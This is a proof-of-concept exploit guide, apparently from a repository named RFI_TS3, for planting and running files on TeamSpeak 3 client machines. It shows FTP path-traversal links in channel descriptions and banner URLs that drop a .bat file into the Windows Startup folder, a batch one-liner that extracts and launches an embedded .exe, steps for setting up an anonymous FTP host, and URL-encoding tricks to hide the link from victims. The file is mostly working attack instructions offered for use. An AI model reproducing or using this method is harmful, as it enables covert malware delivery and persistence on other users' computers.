RFI_TS3

1. Requirements:
2. - FTP server
3. - modify channel description or server admin
4.  
5. TeamSpeak weakpoints:
6. - image files are not checked for file extensions (client problem)
7. - traversal directioning is working for cached downloads (client problem)
8.  
9.  
10. How to inlcude it into TeamSpeak:
11.  
12. - set an image into a channel description:
13. This will download the file when clicking the channel.
14. [img]ftp://8.8.8.8/../../../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat[/img]
15.  
16. - set image into Banner Gfx URL:
17. This will download the file when connecting to the server.
18. ftp://8.8.8.8/../../../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat
19.  
20. -> requires an anonymous user on your ftp server with power to download the according file
21.  
22. -> the file the user is going to download has to be a .bat file. You may make this .bat file
23. extract an .exe file or any other file and execute it, though :)
24.  
25.  
26.  
27. How it works:
28. - image files are not checked for file extensions by teamspeak, but only for 2 characters wich have to be the first ones.
29. Those characters are: "ÿØ"
30.  
31. - The client is going to download any file wich is starting with those two characters.
32. Example:
33.  
34. ÿØ 2>NUL & @echo off & cls stronkhackorskillz1337 & findstr /v "cls stronkhackorskillz1337" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\PoC.bat" > "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\PoC.exe" & cd "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" & start PoC.exe & del poc.bat & exit
35.  
36. This would be the first line in the .bat file.
37. It is going to delete this first line, then copying itself to a new file called PoC.exe and executing this new file. So if you copy this line into an .exe file making this the first line,
38. rename it to .bat -> it "extracts" the .exe and execute it.
39.  
40. It is important to turn on all symbols when creating this file using notepad++
41. http://puu.sh/kDWDS/7631dc484c.png
42. Make sure the line ending for the first line looks like this:
43. http://puu.sh/kDWGk/447ea4c36c.png
44. Otherwise it won't work!
45. To change that ending, press CTRL-F and go to the tab replaceand check the searchmode "regular expressions"
46. CR = \r
47. LF = \n
48. If the line ending shows you only LF, then place your cursor just before the line ending and click "replace" two times until it shows you "1 occurence was replaced." Example in this picture:
49. http://puu.sh/kDWPU/74b114fabe.png
50.  
51. - Travercal directioning is working when downloading files with TeamSpeak, so by default, the file will get downloaded one of the two locations (depends on whether they upgraded to Win10)
52. %appdata%\Roaming\TS3Client\cache\remote\banner.4players.de
53. %appdata%\Local\TS3Client\cache\remote\banner.4players.de
54.  
55. So to escape there and get into the startup folder, you'll have to go up 5 times: ../../../../../
56.  
57. Because we wanted to place the file into the startup directory, we then simply added the path to the startup to the link -> /Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat
58.  
59.  
60. Setting up your FTP server:
61. - Lets assume you want your file to be downloaded into the startup directory..
62. So lets assume you go to your ftp-server from outside (ftp://8.8.8.8) This will be your home directory.
63. So if you want the file to be downloaded to the startup directory you will have to set up the following directories:
64.  
65. Roaming/Microsoft/Windows/Start Menu/Programs/Startup/
66.  
67. inside there you may put any file you want to be downloaded. Remember this has to be a .bat file, because the first two characters have to be "ÿØ". This is only possible with .bat (as far as we tried it)
68.  
69. - Set up a anonymous user for ftp:
70. In order to download the files without problems, you'll have to create an anonymous user with permissions to download from this directory.
71. If you want them to upload something, you'll obviuosly have to grant some upload powers as well
72.  
73.  
74.  
75. Obfuscation:
76. - When putting the image link into the channel description, you might as well obfuscate the link so noone sees how its done.
77. This does not work when putting the link into the servers banner gfx url!
78.  
79. Examples:
80.  
81. Roaming -> %52%6F%61%6D%69%6E%67
82. 8.8.8.8 -> 8%2e8%2e8%2e8
83. Microsoft -> %4d%69%63%72%6f%73%6f%66%74
84. [img]ftp://8.8.8.8/../../../../../Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PoC.bat[/img]
85. [img]ftp://8%2e8%2e8%2e8/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%52%6F%61%6D%69%6E%67%4d%69%63%72%6f%73%6f%66%74%2f%57%69%6e%64%6f%77%73%2f%53%74%61%72%74%20%4d%65%6e%75%2f%50%72%6f%67%72%61%6d%73%2f%53%74%61%72%74%75%70%2f%50%6F%43%2e%62%61%74[/img]
86.  
87. so the conversion rules:
88.  
89. ! %21
90. " %22
91. # %23
92. $ %24
93. % %25
94. & %26
95. ' %27
96. ( %28
97. ) %29
98. * %2A
99. + %2B
100. , %2C
101. - %2D
102. . %2e
103. / %2f (the "/" behind the IP and before has to stay)
104. 0 %30
105. 1 %31
106. 2 %32
107. 3 %33
108. 4 %34
109. 5 %35
110. 6 %36
111. 7 %37
112. 8 %38
113. 9 %39
114. : %3A
115. ; %3B
116. < %3C
117. = %3D
118. > %3E
119. ? %3F
120. @ %40
121. A %41
122. B %42
123. C %43
124. D %44
125. E %45
126. F %46
127. G %47
128. H %48
129. I %49
130. J %4A
131. K %4B
132. L %4C
133. M %4D
134. N %4E
135. O %4F
136. P %50
137. Q %51
138. R %52
139. S %53
140. T %54
141. U %55
142. V %56
143. W %57
144. X %58
145. Y %59
146. Z %5A
147. [ %5B
148. \ %5C
149. ] %5D
150. ^ %5E
151. _ %5F
152. ` %60
153. a %61
154. b %62
155. c %63
156. d %64
157. e %65
158. f %66
159. g %67
160. h %68
161. i %69
162. j %6A
163. k %6B
164. l %6C
165. m %6D
166. n %6E
167. o %6F
168. p %70
169. q %71
170. r %72
171. s %73
172. t %74
173. u %75
174. v %76
175. w %77
176. x %78
177. y %79
178. z %7A
179. { %7B
180. | %7C
181. } %7D
182. ~ %7E